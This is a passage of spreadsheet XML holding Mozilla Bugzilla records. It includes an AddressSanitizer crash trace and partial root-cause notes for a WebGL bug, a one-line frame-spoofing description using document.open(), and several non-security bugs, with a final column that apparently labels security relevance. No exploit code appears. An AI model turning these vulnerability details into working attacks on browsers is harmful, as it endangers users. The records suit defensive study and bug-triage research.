    #99 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #100 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #101 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #102 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #103 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #104 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #105 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #106 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #107 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #108 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #109 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #110 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #111 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #112 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #113 0x7f0d17bb7406 in DispatchCommand&lt;mozilla::HostWebGLContext&gt; /builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h:258:12
    #114 0x7f0d17bb7406 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&amp;&amp;, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLParent.cpp:62:21
    #115 0x7f0d17cd95b6 in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PWebGLParent.cpp:229:79
    #116 0x7f0d1428490e in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasManagerParent.cpp:214:32
    #117 0x7f0d12dc14ad in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1811:25
    #118 0x7f0d12dbdfa3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr&lt;IPC::Message, mozilla::DefaultDelete&lt;IPC::Message&gt;&gt;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1736:9
    #119 0x7f0d12dbf0bb in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1536:3
    #120 0x7f0d12dc00b2 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1634:14
    #121 0x7f0d113725dd in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1234:16
    #122 0x7f0d1137fc54 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:479:10
    #123 0x7f0d12dca30a in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:330:5
    #124 0x7f0d12c1b22a in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:368:10
    #125 0x7f0d12c1b22a in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:361:3
    #126 0x7f0d12c1b22a in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:343:3
    #127 0x7f0d11368cff in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
    #128 0x7f0d2f6eab3f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #129 0x7f0d2f494b42 in start_thread nptl/pthread_create.c:442:8
    #130 0x7f0d2f5269ff  misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/dri/vmwgfx_dri.so+0xad9606) (BuildId: 293fc30af36a77064beef6344631fdf788ebaacb) 
Thread T34 created by T0 here:
    #0 0x55dc073d55ca in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:208:3
    #1 0x7f0d2f6d92a4 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f0d2f6c6e9e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f0d1136cabc in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:634:18
    #4 0x7f0d1137d4fe in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThreadManager::ThreadCreationOptions, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:548:12
    #5 0x7f0d1138b04c in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, already_AddRefed&lt;nsIRunnable&gt;, nsIThreadManager::ThreadCreationOptions) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:175:57
    #6 0x7f0d14240965 in NS_NewNamedThread&lt;15UL&gt; /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:76:10
    #7 0x7f0d14240965 in mozilla::gfx::CanvasRenderThread::Start() /builds/worker/checkouts/gecko/gfx/ipc/CanvasRenderThread.cpp:55:17
    #8 0x7f0d1406f440 in gfxPlatform::InitLayersIPC() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1315:9
    #9 0x7f0d1406843b in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:974:3
    #10 0x7f0d1406ee5f in GetPlatform /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:464:5
    #11 0x7f0d1406ee5f in gfxPlatform::InitializeCMS() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:2109:9
    #12 0x7f0d1bb525eb in EnsureCMSInitialized /builds/worker/workspace/obj-build/dist/include/gfxPlatform.h:968:7
    #13 0x7f0d1bb525eb in GetCMSMode /builds/worker/workspace/obj-build/dist/include/gfxPlatform.h:519:5
    #14 0x7f0d1bb525eb in nsXPLookAndFeel::GetUncachedColor(mozilla::StyleSystemColor, mozilla::ColorScheme, mozilla::LookAndFeel::UseStandins) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:1013:9
    #15 0x7f0d1bb519cf in nsXPLookAndFeel::GetColorValue(mozilla::StyleSystemColor, mozilla::ColorScheme, mozilla::LookAndFeel::UseStandins, unsigned int&amp;) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:993:17
    #16 0x7f0d1bb57926 in mozilla::LookAndFeel::GetColor(mozilla::StyleSystemColor, mozilla::ColorScheme, mozilla::LookAndFeel::UseStandins) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:1437:47
    #17 0x7f0d1ba8c08c in Color /builds/worker/workspace/obj-build/dist/include/mozilla/LookAndFeel.h:465:12
    #18 0x7f0d1ba8c08c in GetAccentColor /builds/worker/checkouts/gecko/widget/ThemeColors.cpp:91:7
    #19 0x7f0d1ba8c08c in mozilla::widget::ThemeColors::RecomputeAccentColors() /builds/worker/checkouts/gecko/widget/ThemeColors.cpp:195:20
    #20 0x7f0d1ba8bb1d in mozilla::widget::Theme::LookAndFeelChanged() /builds/worker/checkouts/gecko/widget/Theme.cpp:182:3
    #21 0x7f0d1bb4f5af in nsXPLookAndFeel::GetInstance() /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:409:3
    #22 0x7f0d1bb583e5 in mozilla::LookAndFeel::GetThemeInfo(nsTSubstring&lt;char&gt;&amp;) /builds/worker/checkouts/gecko/widget/nsXPLookAndFeel.cpp:1550:3
    #23 0x7f0d1118d6c7 in nsSystemInfo::Init() /builds/worker/checkouts/gecko/xpcom/base/nsSystemInfo.cpp:1081:5
    #24 0x7f0d112e30ad in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:11930:7
    #25 0x7f0d1130c022 in CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:184:46
    #26 0x7f0d1130c022 in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::detail::BaseMonitorAutoLock&lt;mozilla::Monitor&gt;&gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:971:17
    #27 0x7f0d1130d55f in nsComponentManagerImpl::GetService(mozilla::xpcom::ModuleID, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1061:10
    #28 0x7f0d112f448d in mozilla::xpcom::GetServiceHelper::operator()(nsID const&amp;, void**) const /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:13134:50
    #29 0x7f0d130ee86c in assign_from_helper /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:897:7
    #30 0x7f0d130ee86c in nsCOMPtr /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:533:5
    #31 0x7f0d130ee86c in GetServiceImpl /builds/worker/checkouts/gecko/js/xpconnect/src/JSServices.cpp:83:32
    #32 0x7f0d130ee86c in GetService /builds/worker/checkouts/gecko/js/xpconnect/src/JSServices.cpp:130:8
    #33 0x7f0d130ee86c in xpc::Services_Resolve(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, bool*) /builds/worker/checkouts/gecko/js/xpconnect/src/JSServices.cpp:153:25
    #34 0x7f0d21e64d3b in CallResolveOp /builds/worker/checkouts/gecko/js/src/vm/NativeObject-inl.h:666:8
    #35 0x7f0d21e64d3b in NativeLookupOwnPropertyInline&lt;(js::AllowGC)1, (js::LookupResolveMode)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject-inl.h:778:14
    #36 0x7f0d21e64d3b in NativeGetPropertyInline&lt;(js::AllowGC)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2239:10
    #37 0x7f0d21e64d3b in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2287:10
    #38 0x7f0d21ada4f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:118:10
    #39 0x7f0d21ada4f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:125:10
    #40 0x7f0d21ada4f9 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:4787:10
    #41 0x7f0d21aacc2c in GetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:245:10
    #42 0x7f0d21aacc2c in js::Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3050:12
    #43 0x7f0d21a9224b in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:400:10
    #44 0x7f0d21a9224b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13
    #45 0x7f0d21a9368c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:612:13
    #46 0x7f0d21a95606 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:647:10
    #47 0x7f0d21a95606 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:679:8
    #48 0x7f0d21a97456 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:801:10
    #49 0x7f0d21e656ad in CallGetter /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2080:12
    #50 0x7f0d21e656ad in GetExistingProperty&lt;(js::AllowGC)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2108:12
    #51 0x7f0d21e656ad in NativeGetPropertyInline&lt;(js::AllowGC)1&gt; /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2256:14
    #52 0x7f0d21e656ad in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2287:10
    #53 0x7f0d21ada4f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:118:10
    #54 0x7f0d21ada4f9 in GetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:125:10
    #55 0x7f0d21ada4f9 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:4787:10
    #56 0x7f0d21aacc2c in GetPropertyOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:245:10
    #57 0x7f0d21aacc2c in js::Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3050:12
    #58 0x7f0d21a9224b in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:400:10
    #59 0x7f0d21a9224b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13
    #60 0x7f0d21a9368c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:612:13
    #61 0x7f0d21a95606 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:647:10
    #62 0x7f0d21a95606 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:679:8
    #63 0x7f0d21bfc902 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:53:10
    #64 0x7f0d1313092d in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedJSClass.cpp:918:17
    #65 0x7f0d113d16f9 in PrepareAndDispatch /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:115:37
    #66 0x7f0d113d03fa in SharedStub xptcstubs_x86_64_linux.cpp
    #67 0x7f0d1130509b in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*) /builds/worker/checkouts/gecko/xpcom/components/nsCategoryManager.cpp:682:19
    #68 0x7f0d216bde29 in nsXREDirProvider::DoStartup() /builds/worker/checkouts/gecko/toolkit/xre/nsXREDirProvider.cpp:811:11
    #69 0x7f0d2169a35e in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5404:18
    #70 0x7f0d2169cced in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5859:8
    #71 0x7f0d2169de41 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5915:21
    #72 0x55dc0742b0e4 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:227:22
    #73 0x55dc0742b0e4 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:445:16
    #74 0x7f0d2f429d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
==9925==ABORTING
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
```
4.	Root Cause Analysis (recommended but not required)
  a. 
  /source/dom/canvas/WebGLContextDraw.cpp
  ```c++
  void WebGLContext::DrawArraysInstanced(const GLenum mode, const GLint first,
                                       const GLsizei vertCount,
                                       const GLsizei instanceCount) {
  const FuncScope funcScope(*this, "drawArraysInstanced");
  // AUTO_PROFILER_LABEL("WebGLContext::DrawArraysInstanced", GRAPHICS);
  if (IsContextLost()) return;
  const gl::GLContext::TlsScope inTls(gl);
  // -
  if (!ValidateNonNegative("first", first) ||
      !ValidateNonNegati</t>
        </is>
      </c>
      <c r="X1757" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" t="n">
        <v>343168</v>
      </c>
      <c r="B1758" t="inlineStr">
        <is>
          <t>2006-06-29 12:07:26 -0700</t>
        </is>
      </c>
      <c r="C1758" t="inlineStr">
        <is>
          <t>frame spoofing using document.open()</t>
        </is>
      </c>
      <c r="D1758" t="inlineStr">
        <is>
          <t>2007-05-31 18:10:41 -0700</t>
        </is>
      </c>
      <c r="E1758" t="n">
        <v>1</v>
      </c>
      <c r="F1758" t="n">
        <v>1</v>
      </c>
      <c r="G1758" t="n">
        <v>3</v>
      </c>
      <c r="H1758" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1758" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1758" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1758" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1758" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1758" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1758" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1758" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1758" t="inlineStr">
        <is>
          <t>[sg:low spoof]</t>
        </is>
      </c>
      <c r="Q1758" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1758" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1758" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T1758" t="n">
        <v>1</v>
      </c>
      <c r="U1758" t="n">
        <v>0</v>
      </c>
      <c r="V1758" t="n">
        <v>25</v>
      </c>
      <c r="W1758" t="inlineStr">
        <is>
          <t>You can replace framed contents using target.frames[n].document.open().
Something similar to bug 13871, bug 20682, bug 246448, and bug 296850.</t>
        </is>
      </c>
      <c r="X1758" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" t="n">
        <v>826471</v>
      </c>
      <c r="B1759" t="inlineStr">
        <is>
          <t>2013-01-03 14:09:16 -0800</t>
        </is>
      </c>
      <c r="C1759" t="inlineStr">
        <is>
          <t>compartment mismatch in nsWindowSH::NewResolve for _content with Xrays</t>
        </is>
      </c>
      <c r="D1759" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1759" t="n">
        <v>1</v>
      </c>
      <c r="F1759" t="n">
        <v>1</v>
      </c>
      <c r="G1759" t="n">
        <v>3</v>
      </c>
      <c r="H1759" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1759" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1759" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1759" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1759" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1759" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1759" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q1759" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1759" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1759" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1759" t="n">
        <v>1</v>
      </c>
      <c r="U1759" t="n">
        <v>0</v>
      </c>
      <c r="V1759" t="n">
        <v>28</v>
      </c>
      <c r="W1759" t="inlineStr">
        <is>
          <t>I came across across 3 of these. These are on builds from 12/29 and 1/1.
The stacks vary, but they look kind of like this:
0 js::CompartmentChecker::fail 	js/src/jscntxtinlines.h:205
1 js::CompartmentChecker::check 	js/src/jscntxtinlines.h:221
2 JS_NewFunction 	js/src/jsapi.cpp:4839
3 nsWindowSH::NewResolve 	dom/base/nsDOMClassInfo.cpp:6902
4 xpc::XPCWrappedNativeXrayTraits::resolveOwnProperty 	js/xpconnect/wrappers/XrayWrapper.cpp:995
5 xpc::XrayWrapper&lt;js::CrossCompartmentWrapper,xpc::XPCWrappedNativeXrayTraits&gt;::g 
It looks like the window's global object is from a different compartment than the context passed into NewResolve.
I don't know if this is useful or not.
https://crash-stats.mozilla.com/report/index/81a84814-74ab-4437-9a59-dc3502130102
https://crash-stats.mozilla.com/report/index/011537dd-0895-4315-ba2b-6a85f2121230
https://crash-stats.mozilla.com/report/index/03a85589-01f4-475d-89ee-bdbe52121230</t>
        </is>
      </c>
      <c r="X1759" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1760">
      <c r="A1760" t="n">
        <v>1381840</v>
      </c>
      <c r="B1760" t="inlineStr">
        <is>
          <t>2017-07-18 07:26:33 -0700</t>
        </is>
      </c>
      <c r="C1760" t="inlineStr">
        <is>
          <t>1 Day Firefox Retention Dataset</t>
        </is>
      </c>
      <c r="D1760" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E1760" t="n">
        <v>1</v>
      </c>
      <c r="F1760" t="n">
        <v>1</v>
      </c>
      <c r="G1760" t="n">
        <v>2</v>
      </c>
      <c r="H1760" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1760" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1760" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1760" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1760" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1760" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1760" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1760" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1760" t="inlineStr"/>
      <c r="Q1760" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1760" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1760" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1760" t="n">
        <v>1</v>
      </c>
      <c r="U1760" t="n">
        <v>0</v>
      </c>
      <c r="V1760" t="n">
        <v>10</v>
      </c>
      <c r="W1760" t="inlineStr">
        <is>
          <t>The churn.v2 dataset computes the unbounded 7 day churn for Firefox profiles. 
This is useful for measuring the rate of churn week over week over a wide set of attributes, but is limited for exploratory purposes. The data exists in telemetry, but the data is not easily accessible.
A new generic churn dataset can support n-day retention, unbounded retention, and even bracket retention with carefully chosen pre-computed views of main_summary. [1] 
# Approach
The approach here is to calculate n-day retention over a daily rolling window that captures 95+% of pings in a given retention window. Good values to pre-compute are the 1, 2, 3, 5, 7, 14, and 30 day retention periods. These values should be sufficient for most n-day retention periods -- you can shift the period through choice of a start (reference) date. 
The retention of arbitrary windows can be reconstructed through set intersection sketches (hyperloglog and minhash). [2]  It is possible to maintain good error bounds for arbitrary, unbounded retention periods. 
Implementation of bracket retention follows above.
# Benchmarking
The existing etl job is slow -- churn.v2 runs an average of 80 minutes over 5 c4.8xlarge machines. The job should take advantage of the catalyst optimizer and caching mechanisms of spark 2.0, allowing for faster computations to support processing significantly more data.
There is a significant amount of re-computation, but this is necessary to capture the full set of data. Jobs can be pruned from running, e.g. windows without sufficient power due to client latency are ignored. It may also be possible to intersect many smaller datasets to build larger datasets.
A multi-tenant spark cluster may be able to take advantage of caching with many smaller jobs.
# Dataset monitoring
Due to the sheer number of derived datasets, there is room for quality control. The process of creating the dataset decomposes the incoming telemetry data in a time window over many smaller frequency components (retention periods). Validation of the data can occur across different frequencies in the same time window, or across time windows. 
For example, the set intersection of many 1-day retention windows should be within some tolerance of the 30-day retention. Additionally, the 1-day retention should not differ significantly from day to day.
These assumptions should be put into validation model that asserts the dataset is within design specifications, alerting (and filing a bug) otherwise.
# Backfills
Backfilling this job should be done separately from the scheduled daily job. The backfill job should aim to reconstruct the dataset with the minimal amount of computation. 
# Other comments
It would be nice to retain properties about cohorts over time such as engagement metrics. However, maintaining an accurate distribution of metrics like `unique_domains_count` across sub-populations is not trivial with sql aggregate functions (min, max, sum, avg, count, count(*)). One approach is to use an reduce-by-key function that operates on a parameterized distribution, and implement it as a user defined aggregate function. [3]
API:
&gt; create_churn(start: date, end: date, n: int, unbounded: bool, attributes: list[col]) -&gt; dataset[row]
[1] https://amplitude.com/blog/2016/08/11/3-ways-measure-user-retention/
[2] http://tech.adroll.com/media/hllminhash.pdf
[3] https://docs.databricks.com/spark/latest/spark-sql/udaf-scala.html</t>
        </is>
      </c>
      <c r="X1760" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" t="n">
        <v>633695</v>
      </c>
      <c r="B1761" t="inlineStr">
        <is>
          <t>2011-02-11 22:47:19 -0800</t>
        </is>
      </c>
      <c r="C1761" t="inlineStr">
        <is>
          <t>EUBallot should be renamed to EUballot</t>
        </is>
      </c>
      <c r="D1761" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1761" t="n">
        <v>1</v>
      </c>
      <c r="F1761" t="n">
        <v>1</v>
      </c>
      <c r="G1761" t="n">
        <v>5</v>
      </c>
      <c r="H1761" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1761" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1761" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1761" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1761" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1761" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N1761" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
